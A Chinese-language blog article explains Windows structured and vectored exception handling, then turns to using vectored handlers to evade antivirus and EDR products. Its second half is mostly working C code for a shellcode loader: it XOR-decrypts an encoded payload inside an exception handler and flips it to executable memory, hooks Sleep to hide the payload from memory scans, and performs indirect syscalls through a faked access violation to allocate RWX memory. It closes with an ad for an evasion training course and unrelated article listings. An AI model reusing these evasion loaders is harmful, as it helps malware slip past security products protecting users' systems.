从安全角度看 SEH 和 VEH

从安全角度看 SEH 和 VEH

异常处理程序是处理程序中不可预见的错误的基本方法之一

  • https://learn.microsoft.com/en-us/dotnet/csharp/fundamentals/exceptions/

SEH——结构化异常处理程序

就其工作方式而言,异常处理程序与其他处理程序相比相当基础,有一个 try 块用于包装不安全代码,还有一个 except 块用于在生成特定异常时进行处理。

在下面的代码中示例中,可以通过将 0 作为第二个输入来生成异常,因为除以零是系统生成的异常。这被包装在try块中,过滤器代码会检查这是什么类型的异常,在这种情况下,如果是,EXCEPTION_INT_DIVIDE_BY_ZERO将继续处理包装在except块中的异常。

int main()
{
  __try
  {
      int inp1 = 0, inp2 = 0;
      printf("第一个输入: ");
      scanf_s("%d", &inp1);
      printf("第二个输入: ");
      scanf_s("%d", &inp2);
      int result = inp1 / inp2;
      printf("结果: %d", result);
  }
  __except ((_exception_code() == EXCEPTION_INT_DIVIDE_BY_ZERO || _exception_code() == EXCEPTION_FLT_DIVIDE_BY_ZERO) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
  {
      printf("触发的异常是: EXCEPTION_FLT_DIVIDE_BY_ZERO\n");
  }

  return 0;
}

从编译时开始。编译器生成有关异常的所有必要信息,异常类型,过滤器的位置和处理它的最终代码等,最后将它们内嵌到PE文件的异常框架中

VEH——向量异常处理程序

向量异常处理是结构化异常处理的扩展,这些处理程序使用回调函数机制工作。每当发生异常时,就会调用这些回调函数。所有这些回调函数都位于二进制文件在运行时添加的排序链接列表中。可以通过 winAPI AddVectoredExceptionHandler在程序中的任何位置注册回调。

需要注意的是,VEH 异常处理程序是全局注册的,并不与单个函数或单个堆栈框架绑定。由于向后兼容,系统首先调用所有 VEH 处理程序,如果所有处理程序均未执行该处理程序,则将其传递给 SEH。此外,VEH 以循环链接列表的形式实现。

PVOID AddVectoredExceptionHandler(
ULONG                       First,
PVECTORED_EXCEPTION_HANDLER Handler
);

winAPI 有两个参数,

  • 第一个参数定义处理函数是否应该注册在链接列表的开头或结尾。这告诉系统首先调用哪个处理程序。

  • 第二个参数是要注册的回调函数的指针。

回调函数定义如下

PVECTORED_EXCEPTION_HANDLER PvectoredExceptionHandler;

LONG PvectoredExceptionHandler(
[in] _EXCEPTION_POINTERS *ExceptionInfo
)

第一个参数中指向结构的指针定义如下

typedef struct _EXCEPTION_POINTERS {
PEXCEPTION_RECORD ExceptionRecord;
PCONTEXT         ContextRecord;
} EXCEPTION_POINTERS, *PEXCEPTION_POINTERS;

该结构包含两个主要成员:

结构体中的第一个指针指向结构体EXCEPTION_RECORD 里面包含定义的异常的详细信息

ExceptionRecord定义如下:

typedef struct _EXCEPTION_RECORD {
DWORD                   ExceptionCode;
DWORD                   ExceptionFlags;
struct _EXCEPTION_RECORD *ExceptionRecord;
PVOID                   ExceptionAddress;
DWORD                   NumberParameters;
ULONG_PTR               ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;

第一个元素是最常用的,它包含产生了什么类型的异常,例如STATUS_INTEGER_DIVISION_BY_ZERO

第二个指针指向结构CONTEXT,其中包含异常发生时CPU上下文的所有细节。这个结构非常重要,因为它可以允许读取和写回数据,一旦执行恢复,这些数据将直接在CPU上应用。这是因为当异常处理程序完成其执行时,系统将根据返回值继续搜索异常或继续执行进程。

当系统继续执行进程时,它调用RtlRestoreContext winAPI来恢复CPU状态和我们覆盖它的数据。由于这是由系统自动完成的,安全产品通常不会检测到这种CPU状态覆盖。

VEH 的使用非常简单:

注册一个名为VEHHandler()的处理程序,它将成为VEH异常列表中的全局处理程序。这个处理程序负责检查发生的异常是否是想要的异常。

LONG WINAPI VEHHandler(
  struct _EXCEPTION_POINTERS* ExceptionInfo
) {
  if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO || ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_FLOAT_DIVIDE_BY_ZERO) {
      printf("触发的异常是: STATUS_INTEGER_DIVIDE_BY_ZERO\n");
  }
  return EXCEPTION_CONTINUE_EXECUTION;
}

int main()
{
  PVOID h1 = AddVectoredExceptionHandler(1, VEHHandler);
  int inp1 = 0, inp2 = 0;
  printf("第一个输入: ");
  scanf_s("%d", &inp1);
  printf("第二个输入: ");
  scanf_s("%d", &inp2);
  int result = inp1 / inp2;
  printf("结果: %d", result);
  RemoveVectoredExceptionHandler(h1);
  return 0;
}

与SEH不同,VEH可以被认为是一种运行时机制,因为处理程序是在运行时过程中的任何地方注册和删除的。

异常处理技术在绕过防护机制中的应用

执行payload

由于可以访问 context 结构,所以可以直接修改 RIP 寄存器的内容以指向想要的任何位置,这意味着可以进行间接调用。

void myFunction() {
//payload..........
  printf("[*] myFunction() Called\n");
}


LONG WINAPI testHandler(
  struct _EXCEPTION_POINTERS* ExceptionInfo
) {
  if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO || ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_FLOAT_DIVIDE_BY_ZERO) {
      ULONG64 Offset = 0x1000;
      HMODULE BaseAddress = GetModuleHandleA(NULL);
      printf("[*]进程基地址: %#llx\n", (ULONG64)BaseAddress);
      ULONG64 FunctionAddress = (ULONG64)BaseAddress + Offset;
      printf("[*] myFunction地址: %#llx\n", (ULONG64)FunctionAddress);
      ExceptionInfo->ContextRecord->Rip = (DWORD64)FunctionAddress;
       
  }
  return EXCEPTION_CONTINUE_EXECUTION;
}

int main()
{
  PVOID h1 = AddVectoredExceptionHandler(1, testHandler);
  int inp1 = 0, inp2 = 0;
  int result = inp1 / inp2;
  RemoveVectoredExceptionHandler(h1);
  return 0;
}
运行时代码解密+规避内存扫描

使用异常EXCEPTION_ACCESS_VIOLATION,该异常在访问无效的内存页或无效的内存页访问权限时生成。由于shellcode被加密并存储在一个全局变量中,全局变量不是可执行内存区域,所以可以通过简单地将变量转换为函数调用并调用它来轻松地生成异常。

#define XOR_KEY 0x66

char encode_shellcode[] = "\x5b\x90\xff\x3b\x5b\x90\xf7\xe3\x5b\x9e\x06\x75\x13..................";

LONG WINAPI testHandler(
  struct _EXCEPTION_POINTERS* ExceptionInfo
) {
  if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION) {
      printf("[*] 进入异常处理\n");
      DWORD flOldProtect;
      for (int i = 0; i < sizeof(enc_shellcode); i++) {
          encode_shellcode[i] ^= XOR_KEY;
      }
      BOOL res = VirtualProtect(encode_shellcode, sizeof(encode_shellcode), PAGE_EXECUTE, &flOldProtect);
      if (res == TRUE) {
          printf("[*] 执行权限改为 PAGE_EXECUTE\n");
      }
  }
  return EXCEPTION_CONTINUE_EXECUTION;
}

int main()
{
  PVOID h1 = AddVectoredExceptionHandler(1, testHandler);
  (*(void (*)()) & encode_shellcode)();
  RemoveVectoredExceptionHandler(h1);
  return 0;
}

然后再Hook Sleep函数,将功能模块的内存属性改为不可执行,便可规避后续的内存扫描。

static VOID(WINAPI* OrigSleep)(DWORD dwMilliseconds) = Sleep;
void WINAPI NewCustomSleep(DWORD dwMilliseconds) {
  if (CustomFlag)
  {
      VirtualFree(customShellcodeAddr, 0, MEM_RELEASE);
      CustomFlag = false;
  }
  printf("custom sleep time:%d\n", dwMilliseconds);
  unhookCustomSleep();
  OrigSleep(dwMilliseconds);
  hookCustomSleep();
}
void hookCustomSleep() {
  DWORD dwOldProtect = NULL;
  BYTE pCustomData[5] = { 0xe9,0x0,0x0,0x0,0x0 };
  RtlCopyMemory(g_OrigSleep, OrigSleep, sizeof(pCustomData));
  DWORD dwCustomOffset = (DWORD)NewCustomSleep - (DWORD)OrigSleep - 5;
  RtlCopyMemory(&pCustomData[1], &dwCustomOffset, sizeof(dwCustomOffset));
  VirtualProtect(OrigSleep, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
  RtlCopyMemory(OrigSleep, pCustomData, sizeof(pCustomData));
  VirtualProtect(OrigSleep, 5, dwOldProtect, &dwOldProtect);
}
void unhookCustomSleep() {
  DWORD dwOldProtect = NULL;
  VirtualProtect(OrigSleep, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
  RtlCopyMemory(OrigSleep, g_OrigSleep, sizeof(g_OrigSleep));
  VirtualProtect(OrigSleep, 5, dwOldProtect, &dwOldProtect);
}

运行时的解密也可以用于对shellcode进行逐条解密一条条的指令执行。这种方式更为猥琐和隐秘,可以通过STATUS_SINGLE_STEP异常和STATUS_ACCESS_VIOLATION异常来实现,读者可以尝试

间接系统调用

与上面提到的可能性类似,也可以修改RIP,用ntdll.dll库中的地址覆盖它,以执行间接的系统调用。

系统调用由寄存器 RAX 控制,其中包含称为 SSN(系统服务编号)

HOOK技术是AV/EDR常用的检测机制,尽管使用syscall可以绕过检测,但这导致了另一种可能的检测机制。在自己的程序中使用系统调用称为直接系统调用技术,而从其他进程(如库本身)调用系统调用称为间接系统调用技术。

当在自己的程序中使用系统调用时,通常可以通过简单的签名被检测到(通过检查系统调用的来源),系统调用的返回地址应该是通过合法的源(如ntdll.dll本身)发生的,但是如果不是这样,它就会发出一个主要的危险信号。这是可以避免的,可以使用向量异常处理进行间接系统调用,这种技术提供了一个看起来非常合法的调用堆栈。这有助于大大降低被发现的可能性

最简单的方法是利用异常STATUS_ACCESS_VIOLATION,该异常在执行对内存的无效访问时生成。可以将想要调用的SSN号码存储在一个变量中,在本例中是0x18,它对应于系统调用ntallocatvirtualmemory,然后将其转换为函数并调用它。本质上,它调用地址0x18的函数,这显然不是一个有效的地址。这反过来会生成STATUS_ACCESS_VIOLATION异常。现在要将参数传递给函数,只需像调用其他函数一样调用存储SSN的变量,上下文将包含传递的参数。

一旦生成异常,就可以模拟系统调用指令,就像在ntdll.dll中找到它一样,并将控制流更改为dll中的系统调用地址。

typedef NTSTATUS(NTAPI* pfnNtAllocateVirtualMemory) (
  IN HANDLE               ProcessHandle,
  IN OUT PVOID*           BaseAddress,
  IN ULONG               ZeroBits,
  IN OUT PULONG           RegionSize,
  IN ULONG               AllocationType,
  IN ULONG               Protect
  );


ULONG_PTR FindSyscallAddr() {
  FARPROC fnDrawText = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtDrawText");
  BYTE* ptr_sysaddr = (BYTE*)(fnDrawText);
  BYTE sig_syscall[] = { 0x0f, 0x05, 0xc3 };
  int cnt_sig = 0, cnt_fn = 0;
  while (TRUE) {
      if (ptr_sysaddr[cnt_fn] == sig_syscall[cnt_sig]) {
          cnt_fn++;
          cnt_sig++;
          if (cnt_sig == sizeof(sig_syscall)) {
              ptr_sysaddr += cnt_fn - sizeof(sig_syscall);
              break;
          }
      }
      else {
          cnt_fn = cnt_fn - cnt_sig + 1;
          cnt_sig = 0;
      }
  }
  return (ULONG_PTR)ptr_sysaddr;
}

LONG WINAPI testHandler(
  struct _EXCEPTION_POINTERS* ExceptionInfo
) {
  if (ExceptionInfo->ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION) {

      ExceptionInfo->ContextRecord->R10 = ExceptionInfo->ContextRecord->Rcx;
      DWORD64 ssn = ExceptionInfo->ContextRecord->Rip;
      printf("[*] Syscall Number: %#x\n", (INT32)ssn);
      ExceptionInfo->ContextRecord->Rax = ssn;
      ULONG_PTR SyscallAddr = FindSyscallAddr();
      ExceptionInfo->ContextRecord->Rip = SyscallAddr;
      return EXCEPTION_CONTINUE_EXECUTION;
  }
  return EXCEPTION_CONTINUE_SEARCH;
}

int main()
{
  PVOID h1 = AddVectoredExceptionHandler(1, testHandler);
  pfnNtAllocateVirtualMemory NtAllocateVirtualMemory = (pfnNtAllocateVirtualMemory)0x18;
  PVOID retAddr = NULL;
  ULONG size = 0x1000;
  NtAllocateVirtualMemory(GetCurrentProcess(), &retAddr, NULL, (PULONG)&size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  if (retAddr == NULL) {
      printf("[!] NtAllocateVirtualMemory Failed\n");
  }
  else {
      printf("[*] NtAllocateVirtualMemory Success: %#llx\n", (ULONG64)retAddr);
  }
  RemoveVectoredExceptionHandler(h1);
  return 0;
}

大家伙,如果想学习更多的知识,可以看我们的论坛:
 哔哩哔哩有免杀基础课程,搜索账号:老鑫安全培训,老鑫安全二进制   

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/944896.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

ESP-IDF学习记录(3)ESP-IDF组件管理

既然官方把这个组件管理按钮放置的这么明显&#xff0c;就一定有他的用心良苦&#xff0c;今天学习一下这个组件管理。 Componments manager 1.给当前项目安装组件 IDF Component Manager and ESP Component Registry Documentation — IDF Component Management documenta…

华为麦芒5(安卓6)termux记录 使用ddns-go,alist

下载0.119bate1 安卓5和6版本,不能换源,其他源似乎都用不了,如果root可以直接用面具模块 https://github.com/termux/termux-app/releases/download/v0.119.0-beta.1/termux-app_v0.119.0-beta.1apt-android-5-github-debug_arm64-v8a.apk 安装ssh(非必要) pkg install open…

园区网综合拓扑实验

一、实验要求 实验拓扑图如上图所示 1、按照图示的VLAN及IP地址需求&#xff0c;完成相关配置 2、要求SW1为VLAN 2/3的主根及主网关 SW2为vlan 20/30的主根及主网关 SW1和SW2互为备份 3、可以使用super vlan&#xff08;本实验未使用&#xff09; 4、上层…

JSON 系列之4:JSON_VALUE

JSON_VALUE的作用&#xff0c;简单来说&#xff0c;就是从JSON到SQL&#xff1a; SQL/JSON function JSON_VALUE selects JSON data and returns a SQL scalar or an instance of a user-defined SQL object type or SQL collection type (varray, nested table) 所以&#xff…

设置首选网络类型以及调用Android框架层的隐藏API

在Android SDK中提供的framework.jar是阉割版本的&#xff0c;比如有些类标记为hide&#xff0c;这些类不会被打包到这个jar中&#xff0c;而有些只是类中的某个方法或或属性被标记为hide&#xff0c;则这些类或属性会被打包到framework.jar&#xff0c;但是我们无法调用&#…

Mac 12.1安装tiger-vnc问题-routines:CRYPTO_internal:bad key length

背景&#xff1a;因为某些原因需要从本地mac连接远程linxu桌面查看一些内容&#xff0c;必须使用桌面查看&#xff0c;所以ssh无法满足&#xff0c;所以决定安装vnc客户端。 问题&#xff1a; 在mac上通过 brew install tiger-vnc命令安装, 但是报错如下&#xff1a; > D…

【Java-tesseract】OCR图片文本识别

文章目录 一、需求二、概述三、部署安装四、技术细节五、总结 一、需求 场景需求:是对识别常见的PNG,JPEG,TIFF,GIF图片识别&#xff0c;环境为离线内网。组件要求开源免费&#xff0c;并且可以集成Java生成接口服务。 二、概述 我不做选型对比了,我筛选测试了下Tesseract(v…

PCIe和DMA:数据传输的“双子星“

简单来说&#xff0c;PCIe是一种硬件总线标准&#xff0c;就像高速公路&#xff1b;DMA是一种数据传输机制&#xff0c;就像在高速公路上行驶的卡车。所以这两个是两种不同的概念。 理解PCIe传输 PCIe&#xff08;PCI Express&#xff09;是一种硬件接口规范&#xff0c;定义…

VS Code中怎样查看某分支的提交历史记录

VsCode中无法直接查看某分支的提交记录&#xff0c;需借助插件才行&#xff0c;常见的插件如果git history只能查看某页面的改动记录&#xff0c;无法查看某分支的整体提交记录&#xff0c;我们可以安装GIT Graph插件来解决这个问题 1.在 VSCode的插件库中搜索 GIT Graph安装&a…

第三方接口设计注意要点

实际工作中&#xff0c;我们会遇到与三方系统对接的情形&#xff0c;比如对接短信服务、支付服务、地图服务、以及一些外部业务系统的调用和回调等等&#xff0c;不论是我们调用第三方接口还是我们为其他系统提供接口服务&#xff0c;调用过程中会遇到一些大大小小的问题和吐槽…

使用 pushy 热更新后 sentry 不能正常显示源码

问题 使用 Android Studio 打包后&#xff0c;上传使用 sentry 官网命令打包的 sourcemap 文件&#xff0c;sentry能正常显示异常位置源码。 使用 pushy 热更新之后&#xff0c;sentry 不能正常显示异常位置的源代码。 如下图&#xff1a; 问题原因&#xff1a; 使用 pushy …

Nginx的性能分析与调优简介

Nginx的性能分析与调优简介 一、Nginx的用途二、Nginx负载均衡策略介绍与调优三、其他调优方式简介四、Nginx的性能监控 一、Nginx的用途 ‌Nginx是一种高性能的HTTP和反向代理服务器&#xff0c;最初作为HTTP服务器开发&#xff0c;主要用于服务静态内容如HTML文件、图像、视…

第26周:文献阅读

目录 摘要 Abstract 文献阅读 现有问题 提出方法 创新点 CEEMDAN-BiGRU-SVR-MWOA框架 多源数据融合 参数优化 方法论 实验研究 数据准备 评估指标 结论 适应性分析 总结 摘要 本周阅读的文献是《A Hybrid Data-Driven Deep Learning Prediction Framework fo…

微信V3支付报错 平台证书及平台证书序列号

1.平台证书及平台证书序列号设置错误报错&#xff1a; 错误1&#xff1a; Verify the response’s data with: timestamp1735184656, noncea5806b8cabc923299f8db1a174f3a4d0, signatureFZ5FgD/jtt4J99GKssKWKA/0buBSOAbWcu6H52l2UqqaJKvrsNxvodB569ZFz5G3fbassOQcSh5BFq6hvE…

LunarVim安装

LunarVim以其丰富的功能和灵活的定制性&#xff0c;迅速在Nvim用户中流行开来。它不仅提供了一套完善的默认配置&#xff0c;还允许用户根据自己的需求进行深度定制。无论是自动补全、内置终端、文件浏览器&#xff0c;还是模糊查找、LSP支持、代码检测、格式化和调试&#xff…

2024.12.25在腾讯云服务器上使用docker部署flask

2024.12.25在腾讯云服务器上使用docker部署flask 操作系统&#xff1a;Ubuntu 根据腾讯云的说明文档安装 Docker 并配置镜像加速源&#xff0c;注意需要安装腾讯云的加速源&#xff0c;使用官网的加速源连接极其不稳定&#xff0c;容易导致运行失败。使用哪个公司的云服务器就…

程序员使用Cursor做独立开发教程

简介 欢迎来到Cursor的独立开发教程&#xff01;在这里&#xff0c;我们将一步步指导您如何成为一名成功的独立开发者&#xff0c;从寻找需求、开发网站、获取流量到网站变现&#xff0c;我们将覆盖独立开发的完整生命周期。 第1章&#xff1a;理解独立开发 1.1 独立开发的…

Java 中的各种锁

​ Java 中我们经常听到各种锁&#xff0c;例如悲观锁&#xff0c;乐观锁&#xff0c;自旋锁等等。今天我们将 Java 中的所有锁放到一起比较一下&#xff0c;并分析各自锁的特点&#xff0c;让大家能够快捷的理解相关知识。 1、悲观锁 VS 乐观锁 从概念上来说 悲观锁: ​ 在…

iOS Masonry对包体积的影响

01 Masonry介绍 Masonry是iOS在控件布局中经常使用的一个轻量级框架&#xff0c;Masonry让NSLayoutConstraint使用起来更为简洁。Masonry简化了NSLayoutConstraint的使用方式&#xff0c;让我们可以以链式的方式为我们的控件指定约束。 常用接口声明与实现&#xff1a; 使用方式…

Flink源码解析之:如何根据StreamGraph生成JobGraph

Flink源码解析之&#xff1a;如何根据StreamGraph生成JobGraph 在上一章节中&#xff0c;我们讲解了Flink如何将用户自定义逻辑算子转换成StreamGraph。在生成StreamGraph的过程中&#xff0c;Flink内部没有做任何优化&#xff0c;只是将用户自定义算子和处理流程转换成了Stre…